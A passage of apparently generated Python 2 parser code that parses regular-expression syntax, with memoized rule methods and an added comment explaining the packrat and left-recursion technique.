_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_call_status = self._concatenation()
_result = _call_status.result
_error = _call_status.error
r1 = _result
_result = self.__chars__('|')
_call_status = self._regex()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
r2 = _result
_result = (r1 | r2)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice1 = self._pos
try:
_call_status = self._concatenation()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
raise BacktrackException(_error)
_call_status = self._concatenation()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._regex()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def concatenation(self):
return self._concatenation().result
def _concatenation(self):
_key = self._pos
_status = self._dict_concatenation.get(_key, None)
if _status is None:
_status = self._dict_concatenation[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
_all0 = []
while 1:
_choice1 = self._pos
try:
_call_status = self._repetition()
_result = _call_status.result
_error = _call_status.error
_all0.append(_result)
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
break
_result = _all0
l = _result
_result = (reduce(operator.add, l, regex.StringExpression("")))
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._concatenation()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def repetition(self):
return self._repetition().result
def _repetition(self):
_key = self._pos
_status = self._dict_repetition.get(_key, None)
if _status is None:
_status = self._dict_repetition[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_call_status = self._primary()
_result = _call_status.result
_error = _call_status.error
r1 = _result
_result = self.__chars__('*')
_result = (r1.kleene())
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice1 = self._pos
try:
_call_status = self._primary()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
r1 = _result
_result = self.__chars__('+')
_result = (r1 + r1.kleene())
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
_choice2 = self._pos
try:
_call_status = self._primary()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
r1 = _result
_result = self.__chars__('?')
_result = (regex.StringExpression("") | r1)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice2
_choice3 = self._pos
try:
_call_status = self._primary()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
r1 = _result
_result = self.__chars__('{')
_call_status = self._clippednumrange()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
n = _result
_result = self.__chars__('}')
_result = (r1 * n + r1.kleene())
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice3
_choice4 = self._pos
try:
_call_status = self._primary()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
r1 = _result
_result = self.__chars__('{')
_call_status = self._numrange()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
n = _result
_result = self.__chars__('}')
_result = (r1 * n[0] + reduce(operator.or_, [r1 * i for i in range(n[1] - n[0] + 1)], regex.StringExpression("")))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice4
_choice5 = self._pos
try:
_result = self.__chars__('{')
_result = (regex.StringExpression("{"))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice5
_choice6 = self._pos
try:
_call_status = self._primary()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice6
raise BacktrackException(_error)
_call_status = self._primary()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._repetition()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def primary(self):
return self._primary().result
def _primary(self):
_key = self._pos
_status = self._dict_primary.get(_key, None)
if _status is None:
_status = self._dict_primary[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_before_discard1 = _result
_result = self.__chars__('(')
_result = _before_discard1
_call_status = self._regex()
_result = _call_status.result
_error = _call_status.error
_before_discard2 = _result
_result = self.__chars__(')')
_result = _before_discard2
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice3 = self._pos
try:
_call_status = self._range()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice3
_choice4 = self._pos
try:
_call_status = self._charclass()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
cc = _result
_result = (reduce(operator.or_, [regex.RangeExpression(a, chr(ord(a) + b - 1)) for a, b in compress_char_set(cc)]))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice4
_choice5 = self._pos
try:
_call_status = self._char()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
c = _result
_result = (regex.StringExpression(c))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice5
_choice6 = self._pos
try:
_result = self.__chars__('.')
_result = (regex.RangeExpression(chr(0), chr(255)))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice6
_choice7 = self._pos
try:
_result = self.__chars__('-')
_result = (regex.StringExpression('-'))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice7
_choice8 = self._pos
try:
_result = self.__chars__('\\')
_result = (regex.StringExpression('\\'))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice8
_choice9 = self._pos
try:
_result = self.__chars__(']')
_result = (regex.StringExpression(']'))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice9
raise BacktrackException(_error)
_result = self.__chars__(']')
_result = (regex.StringExpression(']'))
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._primary()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def char(self):
return self._char().result
def _char(self):
_key = self._pos
_status = self._dict_char.get(_key, None)
if _status is None:
_status = self._dict_char[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_call_status = self._QUOTEDCHAR()
_result = _call_status.result
_error = _call_status.error
c = _result
_result = (unescape(c))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice1 = self._pos
try:
_call_status = self._CHAR()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
c = _result
_result = (c)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
raise BacktrackException(_error)
_call_status = self._CHAR()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
c = _result
_result = (c)
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._char()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def QUOTEDCHAR(self):
return self._QUOTEDCHAR().result
def _QUOTEDCHAR(self):
_key = self._pos
_status = self._dict_QUOTEDCHAR.get(_key, None)
if _status is None:
_status = self._dict_QUOTEDCHAR[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
_startingpos = self._pos
try:
_result = None
_error = None
_result = self._regex1423754537()
assert _status.status != _status.LEFTRECURSION
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = _exc.error
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def CHAR(self):
return self._CHAR().result
def _CHAR(self):
_key = self._pos
_status = self._dict_CHAR.get(_key, None)
if _status is None:
_status = self._dict_CHAR[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
_startingpos = self._pos
try:
_result = None
_error = None
_result = self._regex2132196932()
assert _status.status != _status.LEFTRECURSION
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = _exc.error
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def range(self):
return self._range().result
def _range(self):
_key = self._pos
_status = self._dict_range.get(_key, None)
if _status is None:
_status = self._dict_range[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
_result = self.__chars__('[')
_call_status = self._rangeinner()
_result = _call_status.result
_error = _call_status.error
s = _result
_result = self.__chars__(']')
_result = (reduce(operator.or_, [regex.RangeExpression(a, chr(ord(a) + b - 1)) for a, b in compress_char_set(s)]))
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._range()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def rangeinner(self):
return self._rangeinner().result
def _rangeinner(self):
_key = self._pos
_status = self._dict_rangeinner.get(_key, None)
if _status is None:
_status = self._dict_rangeinner[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_result = self.__chars__('^')
_call_status = self._subrange()
_result = _call_status.result
_error = _call_status.error
s = _result
_result = (set([chr(c) for c in range(256)]) - s)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice1 = self._pos
try:
_call_status = self._subrange()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
raise BacktrackException(_error)
_call_status = self._subrange()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._rangeinner()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def subrange(self):
return self._subrange().result
def _subrange(self):
_key = self._pos
_status = self._dict_subrange.get(_key, None)
if _status is None:
_status = self._dict_subrange[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_result = self.__chars__(']')
_all1 = []
while 1:
_choice2 = self._pos
try:
_call_status = self._rangeelement()
_result = _call_status.result
_error = _call_status.error
_all1.append(_result)
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice2
break
_result = _all1
l = _result
_result = (reduce(operator.or_, [set(["]"])] + l))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice3 = self._pos
try:
_all4 = []
_call_status = self._rangeelement()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
_all4.append(_result)
while 1:
_choice5 = self._pos
try:
_call_status = self._rangeelement()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
_all4.append(_result)
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice5
break
_result = _all4
l = _result
_result = (reduce(operator.or_, l))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice3
raise BacktrackException(_error)
_all6 = []
_call_status = self._rangeelement()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
_all6.append(_result)
while 1:
_choice7 = self._pos
try:
_call_status = self._rangeelement()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
_all6.append(_result)
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice7
break
_result = _all6
l = _result
_result = (reduce(operator.or_, l))
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._subrange()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def rangeelement(self):
return self._rangeelement().result
def _rangeelement(self):
_key = self._pos
_status = self._dict_rangeelement.get(_key, None)
if _status is None:
_status = self._dict_rangeelement[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_call_status = self._charclass()
_result = _call_status.result
_error = _call_status.error
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice1 = self._pos
try:
_call_status = self._char()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
c1 = _result
_result = self.__chars__('-')
_call_status = self._char()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
c2 = _result
_result = (set([chr(i) for i in range(ord(c1), ord(c2) + 1)]))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
_choice2 = self._pos
try:
_result = self.__chars__('.')
_result = ( set(['.']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice2
_choice3 = self._pos
try:
_result = self.__chars__('*')
_result = ( set(['*']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice3
_choice4 = self._pos
try:
_result = self.__chars__('+')
_result = ( set(['+']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice4
_choice5 = self._pos
try:
_result = self.__chars__('?')
_result = ( set(['?']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice5
_choice6 = self._pos
try:
_result = self.__chars__('-')
_result = ( set(['-']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice6
_choice7 = self._pos
try:
_result = self.__chars__('[')
_result = ( set(['[']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice7
_choice8 = self._pos
try:
_call_status = self._char()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
c = _result
_result = ( set([c]) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice8
raise BacktrackException(_error)
_call_status = self._char()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
c = _result
_result = ( set([c]) )
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._rangeelement()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def numrange(self):
return self._numrange().result
def _numrange(self):
_key = self._pos
_status = self._dict_numrange.get(_key, None)
if _status is None:
_status = self._dict_numrange[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_call_status = self._NUM()
_result = _call_status.result
_error = _call_status.error
n1 = _result
_result = self.__chars__(',')
_call_status = self._NUM()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
n2 = _result
_result = (n1, n2)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice1 = self._pos
try:
_call_status = self._NUM()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
n1 = _result
_result = (n1, n1)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
raise BacktrackException(_error)
_call_status = self._NUM()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
n1 = _result
_result = (n1, n1)
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._numrange()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def clippednumrange(self):
return self._clippednumrange().result
def _clippednumrange(self):
_key = self._pos
_status = self._dict_clippednumrange.get(_key, None)
if _status is None:
_status = self._dict_clippednumrange[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
_call_status = self._NUM()
_result = _call_status.result
_error = _call_status.error
n1 = _result
_result = self.__chars__(',')
_result = (n1)
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._clippednumrange()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def charclass(self):
return self._charclass().result
def _charclass(self):
_key = self._pos
_status = self._dict_charclass.get(_key, None)
if _status is None:
_status = self._dict_charclass[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_result = self.__chars__('\\')
_result = self.__chars__('d')
_result = ( set([chr(c) for c in range(ord('0'), ord('9')+1)]) )
break
except BacktrackException, _exc:
_error = _exc.error
self._pos = _choice0
_choice1 = self._pos
try:
_result = self.__chars__('\\')
_result = self.__chars__('s')
_result = ( set(['\t', '\n', '\f', '\r', ' ']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
_choice2 = self._pos
try:
_result = self.__chars__('\\')
_result = self.__chars__('w')
_result = ( set([chr(c) for c in range(ord('a'), ord('z')+1)] + [chr(c) for c in range(ord('A'), ord('Z')+1)] + [chr(c) for c in range(ord('0'), ord('9')+1)] + ['_']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice2
_choice3 = self._pos
try:
_result = self.__chars__('\\')
_result = self.__chars__('D')
_result = ( set([chr(c) for c in range(256)]) - set([chr(c) for c in range(ord('0'), ord('9')+1)]) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice3
_choice4 = self._pos
try:
_result = self.__chars__('\\')
_result = self.__chars__('S')
_result = ( set([chr(c) for c in range(256)]) - set(['\t', '\n', '\f', '\r', ' ']) )
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice4
_choice5 = self._pos
try:
_result = self.__chars__('\\')
_result = self.__chars__('W')
_result = ( set([chr(c) for c in range(256)]) - set([chr(c) for c in range(ord('a'), ord('z')+1)] + [chr(c) for c in range(ord('A'), ord('Z')+1)] + [chr(c) for c in range(ord('0'), ord('9')+1)] + ['_']))
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice5
raise BacktrackException(_error)
_result = self.__chars__('\\')
_result = self.__chars__('W')
_result = ( set([chr(c) for c in range(256)]) - set([chr(c) for c in range(ord('a'), ord('z')+1)] + [chr(c) for c in range(ord('A'), ord('Z')+1)] + [chr(c) for c in range(ord('0'), ord('9')+1)] + ['_']))
break
assert _status.status != _status.LEFTRECURSION
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def NUM(self):
return self._NUM().result
def _NUM(self):
_key = self._pos
_status = self._dict_NUM.get(_key, None)
if _status is None:
_status = self._dict_NUM[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
_startingpos = self._pos
try:
_result = None
_error = None
_result = self._regex1166214427()
c = _result
_result = (int(c))
assert _status.status != _status.LEFTRECURSION
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = _exc.error
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
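# Annotation (not part of the generated source): every rule method above
# follows the same packrat pattern -- the outcome of parsing a rule at a given
# input position is memoized in the corresponding self._dict_* mapping as a
# Status object, so each (rule, position) pair is parsed at most once and
# backtracking stays linear in the input length. A minimal sketch of the idea,
# with hypothetical names:
#
#     def _rule(self):
#         status = self._dict_rule.get(self._pos)
#         if status is not None and status.status == status.NORMAL:
#             self._pos = status.pos        # reuse the memoized result
#             return status
#         ...                               # parse normally, then cache
#
# The INPROGRESS/LEFTRECURSION/SOMESOLUTIONS states appear to implement
# seed-growing support for left-recursive rules (in the style of Warth et al.).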
def __init__(self, inputstream):
self._dict_EOF = {}
self._dict_parse = {}
self._dict_regex = {}
self._dict_concatenation = {}
self._dict_repetition = {}
self._dict_primary = {}
self._dict_char = {}
self._dict_QUOTEDCHAR = {}
self._dict_CHAR = {}
self._dict_range = {}
self._dict_rangeinner = {}
self._dict_subrange = {}
self._dict_rangeelement = {}
self._dict_numrange = {}
self._dict_clippednumrange = {}
self._dict_charclass = {}
self._dict_NUM = {}
self._pos = 0
self._inputstream = inputstream
def _regex2132196932(self):
_choice0 = self._pos
